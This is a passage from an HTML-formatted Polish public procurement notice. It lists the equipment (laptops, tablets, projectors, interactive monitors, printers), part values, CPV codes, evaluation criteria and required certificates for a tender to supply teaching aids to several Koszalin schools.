rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Zakres zadania obejmuje dostawę pomocy dydaktycznych bezpośrednio do Szkoły Podstawowej nr 6 im. Narodowego Święta Niepodległości w Koszalinie, ul. Gnieźnieńska 3, 75-736 Koszalin. <br/>2. Szczegółowy zakres rzeczowy obejmuje dostawę:<br/>- komputera przenośnego typ I w liczbie 1 szt.<br/>- tabletów multimedialnych w liczbie 2 szt. <br/>- projektorów w liczbie 6 szt.<br/>- monitorów interaktywnych w liczbie 2 szt. <br/>- komputerów przenośnych typ II w liczbie 2 szt. <br/>3. Szczegółowe określenie przedmiotu zamówienia dla Zadania nr 3 zawarte jest w Rozdziale II SWZ oraz w projekcie umowy zawartym w Rozdziale V SWZ. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 42133,96 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30213100-6 - Komputery przenośne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30231320-6 - Monitory dotykowe</p> <p class="mb-0">38652120-7 - Projektory wideo</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami i ich wagą: <br/><br/>1) Cena (C) – 60%<br/>2) Przedłużenie okresu gwarancji (G) – 35%<br/>3) Klauzula społeczna (S) – 5% <br/><br/>Ocena ofert (O) zostanie przeprowadzona w oparciu o przedstawione kryteria oraz ich wagę. <br/>Oferty oceniane będą punktowo w przyjętej skali 100 pkt. <br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą liczbę punktów. Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku, według wzoru: O = C + G+ S.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Przedłużenie okresu gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">35</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Klauzula społeczna</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Zakres zadania obejmuje dostawę pomocy dydaktycznych bezpośrednio do Szkoły Podstawowej nr 7 im. I Armii Wojska Polskiego w Koszalinie, ul. Wojska Polskiego 36, 75-712 Koszalin. <br/>2. Szczegółowy zakres rzeczowy obejmuje dostawę:<br/>- monitora interaktywnego w liczbie 1 szt. <br/>- tabletów multimedialnych w liczbie 8 szt. <br/>- projektorów typ I w liczbie 2 szt. <br/>- komputerów stacjonarnych w liczbie 3 zestawów<br/>- komputerów przenośnych w liczbie 10 szt. <br/>- routera w liczbie 1 szt.<br/>- drukarki w liczbie 1 szt. <br/>- projektora typ II w liczbie 1 szt.<br/>3. Szczegółowe określenie przedmiotu zamówienia dla Zadania nr 4 zawarte jest w Rozdziale II SWZ oraz w projekcie umowy zawartym w Rozdziale V SWZ. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 50375,25 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30213100-6 - Komputery przenośne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30231320-6 - Monitory dotykowe</p> <p class="mb-0">38652120-7 - Projektory wideo</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami i ich wagą: <br/><br/>1) Cena (C) – 60%<br/>2) Przedłużenie okresu gwarancji (G) – 35%<br/>3) Klauzula społeczna (S) – 5% <br/><br/>Ocena ofert (O) zostanie przeprowadzona w oparciu o przedstawione kryteria oraz ich wagę. <br/>Oferty oceniane będą punktowo w przyjętej skali 100 pkt. <br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą liczbę punktów. Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku, według wzoru: O = C + G+ S.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Przedłużenie okresu gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">35</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Klauzula społeczna</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Zakres zadania obejmuje dostawę pomocy dydaktycznych bezpośrednio do Szkoły Podstawowej nr 10 im. Stefana Żeromskiego w Koszalinie, ul. Fryderyka Chopina 42, 75-567 Koszalin.<br/>2. Szczegółowy zakres rzeczowy obejmuje dostawę:<br/>- głośników Bluetooth w liczbie 2 szt. <br/>- aparatów fotograficznych w liczbie 6 szt. <br/>- tabletów multimedialnych w liczbie 10 szt. <br/>- tabletów graficznych w liczbie 11 szt. <br/>- komputerów przenośnych typ I w liczbie 1 szt. <br/>- drukarki typ I w liczbie 1 szt. <br/>- monitora w liczbie 1 szt.<br/>- głośników w liczbie 1 zestaw <br/>- wizualizera w liczbie 2 szt. <br/>- komputerów przenośny typ II w liczbie 2 szt. <br/>- monitorów interaktywnych w liczbie 2 szt. <br/>- drukarki typ II w liczbie 1 szt. <br/>3. Szczegółowe określenie przedmiotu zamówienia dla Zadania nr 5 zawarte jest w Rozdziale II SWZ oraz w projekcie umowy zawartym w Rozdziale V SWZ. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 41941,48 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30231320-6 - Monitory dotykowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30237450-8 - Tablety graficzne</p> <p class="mb-0">30213100-6 - Komputery przenośne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami i ich wagą: <br/><br/>1) Cena (C) – 60%<br/>2) Przedłużenie okresu gwarancji (G) – 35%<br/>3) Klauzula społeczna (S) – 5% <br/><br/>Ocena ofert (O) zostanie przeprowadzona w oparciu o przedstawione kryteria oraz ich wagę. <br/>Oferty oceniane będą punktowo w przyjętej skali 100 pkt. <br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą liczbę punktów. Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku, według wzoru: O = C + G+ S.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Przedłużenie okresu gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">35</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Klauzula społeczna</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Zakres zadania obejmuje dostawę pomocy dydaktycznych bezpośrednio do Szkoły Podstawowej nr 17 im. Orła Białego w Koszalinie, ul. Melchiora Wańkowicza 11, 75-445 Koszalin.<br/>2. Szczegółowy zakres rzeczowy obejmuje dostawę:<br/>- tabletów dla uczniów w liczbie 10 szt. <br/>- tabletów dla nauczycieli w liczbie 1 szt.<br/>- komputerów przenośnych w liczbie 32 szt. <br/>- szafy mobilnej do komputerów przenośnych w liczbie 2 szt. <br/>- słuchawek w liczbie 32 szt.<br/>- monitorów interaktywnych w liczbie 3 szt. <br/>- urządzenia do transmisji danych cyfrowych w liczbie 1 zestaw<br/>- drukarki w liczbie 1 szt. <br/>3. Szczegółowe określenie przedmiotu zamówienia dla Zadania nr 6 zawarte jest w Rozdziale II SWZ oraz w projekcie umowy zawartym w Rozdziale V SWZ. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 118954,68 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30213100-6 - Komputery przenośne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30231320-6 - Monitory dotykowe</p> <p class="mb-0">30237450-8 - Tablety graficzne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami i ich wagą: <br/><br/>1) Cena (C) – 60%<br/>2) Przedłużenie okresu gwarancji (G) – 35%<br/>3) Klauzula społeczna (S) – 5% <br/><br/>Ocena ofert (O) zostanie przeprowadzona w oparciu o przedstawione kryteria oraz ich wagę. <br/>Oferty oceniane będą punktowo w przyjętej skali 100 pkt. <br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą liczbę punktów. Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku, według wzoru: O = C + G+ S.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Przedłużenie okresu gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">35</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Klauzula społeczna</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Zakres zadania obejmuje dostawę pomocy dydaktycznych bezpośrednio do Szkoły Podstawowej nr 18 im. Jana Matejki, ul. Stanisława Staszica 6, 75-449 Koszalin.<br/>2. Szczegółowy zakres rzeczowy obejmuje dostawę:<br/>- komputerów przenośnych w liczbie 32 szt.<br/>- szafy mobilnej do komputerów przenośnych w liczbie 2 szt. <br/>- monitora interaktywnego w liczbie 1 szt. <br/>- drukarki w liczbie 1 szt.<br/>3. Szczegółowe określenie przedmiotu zamówienia dla Zadania nr 7 zawarte jest w Rozdziale II SWZ oraz w projekcie umowy zawartym w Rozdziale V SWZ. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 91213,86 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30213100-6 - Komputery przenośne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30231320-6 - Monitory dotykowe</p> <p class="mb-0">30232130-4 - Kolorowe drukarki atramentowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami i ich wagą: <br/><br/>1) Cena (C) – 60%<br/>2) Przedłużenie okresu gwarancji (G) – 35%<br/>3) Klauzula społeczna (S) – 5% <br/><br/>Ocena ofert (O) zostanie przeprowadzona w oparciu o przedstawione kryteria oraz ich wagę. <br/>Oferty oceniane będą punktowo w przyjętej skali 100 pkt. <br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą liczbę punktów. Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku, według wzoru: O = C + G+ S.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Przedłużenie okresu gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">35</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Klauzula społeczna</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 8</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Zakres zadania obejmuje dostawę pomocy dydaktycznych bezpośrednio do I Liceum Ogólnokształcącego im. Stanisława Dubois w Koszalinie, ul. Komisji Edukacji Narodowej 1, 75-070 Koszalin.<br/>2. Szczegółowy zakres rzeczowy obejmuje dostawę:<br/>- komputerów stacjonarnych typ I w liczbie 17 zestawów <br/>- komputerów stacjonarnych typ II w liczbie 2 szt. <br/>- monitorów interaktywnych w liczbie 3 szt. <br/>- drukarki w liczbie 1 szt.<br/>3. Szczegółowe określenie przedmiotu zamówienia dla Zadania nr 8 zawarte jest w Rozdziale II SWZ oraz w projekcie umowy zawartym w Rozdziale V SWZ. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 122913,30 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30213000-5 - Komputery osobiste</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30231320-6 - Monitory dotykowe</p> <p class="mb-0">30232100-5 - Drukarki i plotery</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami i ich wagą: <br/><br/>1) Cena (C) – 60%<br/>2) Przedłużenie okresu gwarancji (G) – 35%<br/>3) Klauzula społeczna (S) – 5% <br/><br/>Ocena ofert (O) zostanie przeprowadzona w oparciu o przedstawione kryteria oraz ich wagę. <br/>Oferty oceniane będą punktowo w przyjętej skali 100 pkt. <br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą liczbę punktów. Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku, według wzoru: O = C + G+ S.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Przedłużenie okresu gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">35</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Klauzula społeczna</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Nie dotyczy.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Nie dotyczy.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Na potwierdzenie zgodności oferowanej dostawy z wymaganiami określonymi w Rozdziale II SWZ – Opis przedmiotu zamówienia, Zamawiający żąda złożenia wraz z ofertą niżej wymienionych przedmiotowych środków dowodowych:<br/><br/>1) Zadanie nr 1 – Dostawa pomocy dydaktycznych do Szkoły Podstawowej nr 3 w Koszalinie:<br/>1.1) dla komputerów przenośnych<br/>1.1.1)	Certyfikat ISO 9001 dla producenta sprzętu lub dokument równoważny;<br/>1.1.2)	Certyfikat ISO 14001 dla producenta sprzętu lub dokument równoważny;<br/>1.1.3)	Certyfikat ISO 50001 dla producenta sprzętu lub dokument równoważny;<br/>1.1.4)	Deklaracja zgodności CE;<br/>1.1.5)	Certyfikat ISO 9001 dla firmy (producenta lub autoryzowanego partnera serwisowego producenta) serwisującej sprzęt lub dokument równoważny;<br/><br/>2) Zadanie nr 3 – Dostawa pomocy dydaktycznych do Szkoły Podstawowej nr 6 w Koszalinie:<br/>2.1) dla komputerów przenośnych typ I<br/>2.1.1)	Certyfikat ISO 9001 dla producenta sprzętu lub dokument równoważny;<br/>2.1.2)	Certyfikat ISO 14001 dla producenta sprzętu lub dokument równoważny;<br/>2.1.3)	Certyfikat ISO 50001 dla producenta sprzętu lub dokument równoważny;<br/>2.1.4)	Deklaracja zgodności CE;<br/>2.1.5)	Certyfikat ISO 9001 dla firmy (producenta lub autoryzowanego partnera serwisowego producenta) serwisującej sprzęt lub dokument równoważny; <br/>2.2) dla komputerów przenośnych typ II:<br/>2.2.1)	Certyfikat ISO 9001 dla producenta sprzętu lub dokument równoważny;<br/>2.2.2)	Certyfikat ISO 14001 dla producenta sprzętu lub dokument równoważny;<br/>2.2.3)	Certyfikat ISO 50001 dla producenta sprzętu lub dokument równoważny;<br/>2.2.4)	Deklaracja zgodności CE;<br/>2.2.5)	Certyfikat ISO 9001 dla firmy (producenta lub autoryzowanego partnera serwisowego producenta) serwisującej sprzęt lub dokument równoważny<br/><br/>3) Zadanie nr 4 – Dostawa pomocy dydaktycznych do Szkoły Podstawowej nr 7 w Koszalinie:<br/>3.1) dla komputerów stacjonarnych:<br/>3.1.1)	Certyfikat ISO 9001 dla producenta sprzętu lub dokument równoważny;<br/>3.1.2)	Certyfikat ISO 14001 dla producenta sprzętu lub dokument równoważny;<br/>3.1.3)	Certyfikat ISO 50001 dla producenta sprzętu lub dokument równoważny;<br/>3.1.4)	Deklaracja zgodności CE komputera;<br/>3.1.5)	Certyfikat ISO 9001 dla firmy (producenta lub autoryzowanego partnera serwisowego producenta) serwisującej komputer lub dokument równoważny; <br/>3.1.6)	Deklaracja zgodności CE monitora;<br/>3.1.7)	Certyfikat ISO 9001 dla firmy (producenta lub autoryzowanego partnera serwisowego producenta) serwisującej monitor lub dokument równoważny; <br/>3.2) dla komputerów przenośnych:<br/>3.2.1)	Certyfikat ISO 9001 dla producenta sprzętu lub dokument równoważny;<br/>3.2.2)	Certyfikat ISO 14001 dla producenta sprzętu lub dokument równoważny;<br/>3.2.3)	Certyfikat ISO 50001 dla producenta sprzętu lub dokument równoważny;<br/>3.2.4)	Deklaracja zgodności CE;<br/>3.2.5)	Certyfikat ISO 9001 dla firmy (producenta lub autoryzowanego partnera serwisowego producenta) serwisującej sprzęt lub dokument równoważny; <br/><br/>4) Zadanie nr 5 – Dostawa pomocy dydaktycznych do Szkoły Podstawowej nr 10 w Koszalinie:<br/>4.1) dla komputerów przenośnych typ I:<br/>4.1.1)	Certyfikat ISO 9001 dla producenta sprzętu lub dokument równoważny;<br/>4.1.2)	Certyfikat ISO 14001 dla producenta sprzętu lub dokument równoważny;<br/>4.1.3)	Certyfikat ISO 50001 dla producenta sprzętu lub dokument równoważny;<br/>4.1.4)	Deklaracja zgodności CE;<br/>4.1.5)	Certyfikat ISO 9001 dla firmy (producenta lub autoryzowanego partnera serwisowego producenta) serwisującej sprzęt lub dokument równoważny<br/>4.2) dla komputerów przenośnych typ II<br/>4.2.1)	Certyfikat ISO 9001 dla producenta sprzętu lub dokument równoważny;<br/>4.2.2)	Certyfikat ISO 14001 dla producenta sprzętu lub dokument równoważny;<br/>4.2.3)	Certyfikat ISO 50001 dla producenta sprzętu lub dokument równoważny;<br/>4.2.4)	Deklaracja zgodności CE;<br/>4.2.5)	Certyfikat ISO 9001 dla firmy (producenta lub autoryzowanego partnera serwisowego producenta) serwisującej sprzęt lub dokument równoważny; (...)<br/><br/>Z uwagi na ograniczoną ilość znaków c.d. powyższej treści znajduje się w pkt 5.11 poniżej (pkt II) <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> I.<br/>1. W celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania, Zamawiający żąda od Wykonawcy złożenia odpisu lub informacji z KRS, CEiDG lub innego właściwego rejestru. Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa w zdaniu pierwszym, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskaże dane umożliwiające dostęp do tych dokumentów. 2. Jeżeli w imieniu Wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o których 